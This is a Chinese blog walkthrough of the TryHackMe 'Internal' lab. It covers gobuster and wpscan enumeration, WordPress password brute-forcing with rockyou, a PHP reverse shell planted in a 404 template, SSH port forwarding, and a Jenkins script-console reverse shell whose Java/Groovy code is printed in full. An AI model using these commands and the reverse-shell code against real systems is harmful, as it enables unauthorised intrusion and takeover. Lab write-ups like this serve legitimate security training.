TRY HACK ME | INTERNAL「渗透测试挑战02」
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG!
THM靶场:INTERNAL
很简单的靶场,有手就行
启动机器,连接openvpn,点击“Start Machine”获取目标IP,本次测试使用KAIL作为攻击机,连接成功后显示如下:
可以看到,这是一个apache的默认页面,根据题目的提示,我们需要先将主机添加到 /etc/hosts ,我们先nano 打开,然后将域名internal.thm添加上,我这里在MAC和KALI上都设置了,只显示一个MAC的页面供大家参考
然后,我们使用gobuster来爆破一波目录,命令构造如下:
gobuster dir -u http://10.10.103.9/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
可以看到扫描结果里,有wordpress页面,所以说可以看出来这是一个用wp搭建的blog网站,我们看下管理页面,即wp-admin:
看到wp-admin页面,我们直接搞一波wpscan,扫一下有没有相关的漏洞,构造命令:
wpscan --url http://10.10.103.9/blog -e ap,at,tt,cb,dbe,u,m
使用 -e 选项来枚举所有插件、所有主题、timthumbs、配置备份、数据库导出、用户和媒体,结果如下:
分析下没什么有用的信息,只有一个admin默认用户,下面我们直接爆破,构造命令:
wpscan --url http://10.10.103.9/blog -U admin -P /usr/share/wordlists/rockyou.txt
结果如下:
获取了用户名和密码后,我们登录WORDPRESS页面,进入后,我们上传反向shell,KALI里自带php-reverse-shell.php,复制粘贴到后台,在404模板下修改,注意这里要修改端口号和IP,然后保存下:
成功后在URL上访问页面并构造nc -lnvp 1234监听端口,获取shell成功!
列举常见文件和目录,发现了一个用户的凭据:
使用ssh登录成功!
列举全部文件,发现了flag文件,cat后再次发现一个jenkins.txt文件,很有可能网站上还有jenkins服务
我们再cat jenkins.txt文件,果然如我们所料,在8080端口上开启了jenkins服务
由于端口 8080 只能通过本地访问,设置端口转发以便将流量重定向到端口 1234 上的 localhost 到端口 8080 上的目标机器,构造命令:
ssh -f -N -L 1234:127.0.0.1:8080 aubreanna@internal.thm
看到Jenkins页面,直接打开BP抓包爆破,常规套路,这里就不赘述了,进去后有个可以传脚本的页面,上传一个大佬写的脚本,具体如下:
String host=”localhost”;
int port=8044;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
最后一步,设置监听端口,直接获取root权限,最后搜索一波flag,搞定!
INTERNAL 靶场通关小结
可能是因为做的题目和写的文章已经比较多了,现在再看这样的题目只觉得很简单,得心应手、行云流水,其实无非都是那几个常规的突破口,关键还是在于培养自己信息收集的能力和洞察问题的耐心。如果有部分不明白的,可以把流程反反复复的多看几遍,同时也非常欢迎大家私信我,如果觉得内容做的不错的话,也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系,十分感谢能看到这里的各位,虽然制作不易,看到你们的点赞我还是很开心的!我们下期再见,拜了个拜~~~
TRY HACK ME | INTERNAL「渗透测试挑战02」相关推荐
- 【保姆级】黑客入门教程「Python安全攻防:渗透测试实战指南」经典纯狱风~
前言 网络江湖,风起云涌,攻防博弈,从未间断,且愈演愈烈.从架构安全到被动纵深防御,再到主动防御.安全智能,直至进攻反制,皆直指安全的本质--攻防.未知攻,焉知防! 每一位网络安全从业者都有仗剑江湖的 ...
- 「UI 测试自动化selenium」汇总
<selenium 基础之java实现> selenium RC 环境配置 菜鸟学自动化测试(一)----selenium IDE 菜鸟学自动化测试(二)----selenium IDE ...
- [车联网安全自学篇] Android安全之移动安全测试指南「安全测试和SDLC」
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 0x01 前言 尽管安全测试的原则,在最近的历史上没有发生根 ...
- 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...
- 只招「测试开发工程师」了
早些年(或者你入行前听说的 / 你在书本上看到的),也许有「自动测试工程师,性能测试工程师,安全测试工程师」等岗位 . 然而,随着这几年的企业最佳实战,及「围绕高效干活为目的」的落地 : 大有变化 . ...
- Hack The Box,一款有意思的渗透测试平台
前言 Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法.它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的 ...
- 渗透测试平台【Hack The Box】获取邀请码与注册讲解
Hack The Box是国外很专业的在线渗透测试平台,题型范围广.更新快,深受广大安全爱好者喜爱,不过有一定门槛,比如注册也是需要解题的,这篇文章就先讲一下注册,以后会更新靶场的题解 官方网址:ha ...
- 渗透测试 | 几款常用的CMS识别「Web指纹识别」扫描脚本工具(含下载地址)
在对「靶标资产」进行渗透测试的前期,通常需要对「靶标资产」进行相关的信息收集,而对「靶标资产」进行Web指纹信息扫描也是信息收集当中很关键的一部分. 能否有效识别出「靶标资产」的Web指纹信息,主要还 ...
- [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
[i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...
最新文章
- 1016 Phone Bills
- 最新版火车头织梦内容发布规则_火车头采集器V8.6发布dedecms自定义字段解决方案...
- 菜鸟教程-Javascript学习笔记-JS函数之前
- ML.NET Cookbook:(20)我如何定义自己的数据转换?
- 计算机重应用,装了一大堆应用,iPhone6会变重吗?
- 【云栖大会】站在时间轴上看基础设施
- 单片机中段程序_单片机c语言中的一小段程序解读
- PC值=当前程序执行位置+8
- Atitit.dwr3 不能显示错误详细信息的解决方案,控件显示错误详细信息的解决方案 java .net php
- C语言:文件的读写操作
- 魔兽世界经典游戏ID搞笑篇 魔兽世界搞笑ID
- JAVA-final关键字和接口
- 【斯坦福公开课-机器学习】1.机器学习的动机和应用(吴恩达 Andrew Ng)
- 零伽壹链改案例:区块链赋能供应链应用 新电商逆袭成长
- 小米4未显示4g连接服务器,小米4wifi连接上但打不开网页怎么办?
- 中国水果和蔬菜种子市场趋势报告、技术动态创新及市场预测
- B2B 客户支持,如何做好?
- Java设计模式之策略模式(UML类图分析+代码详解)
- hadoop-2.7.1 下载及 windows 环境使用
- 计蒜客 T1954 圆锥体的表面积 JAVA
热门文章
- python xlwt安装linux_Linux安装Python xlrd、xlwt、xlutils模块
- JSPServlet中request.getParameter() 和request.getAttribute() 区别
- 《用户至上:用户研究方法与实践》用户体验入门
- Java面试题总结-2022版
- 计算机与昆虫关系的论文,浅谈昆虫与人类的关系.doc
- eclipse设置pom.xml打开方式
- 陈强教授《机器学习及R应用》课程 第十四章作业
- 苹果在企业中的应用提升
- 基于Android Tv制作一个Tv桌面(二)
- 软工实践 - 第八次作业